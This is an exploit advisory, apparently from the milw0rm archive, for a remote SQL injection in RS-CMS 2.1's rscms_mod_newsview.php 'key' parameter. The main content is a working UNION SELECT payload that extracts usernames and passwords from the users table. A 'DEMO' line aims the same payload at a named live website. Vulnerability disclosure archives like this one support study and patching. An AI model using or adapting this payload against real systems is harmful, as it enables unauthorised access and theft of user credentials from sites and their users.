=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
BUGS
====
Sql Injections:
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
DEMO
====
http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
all my Friends
# milw0rm.com [2009-06-22]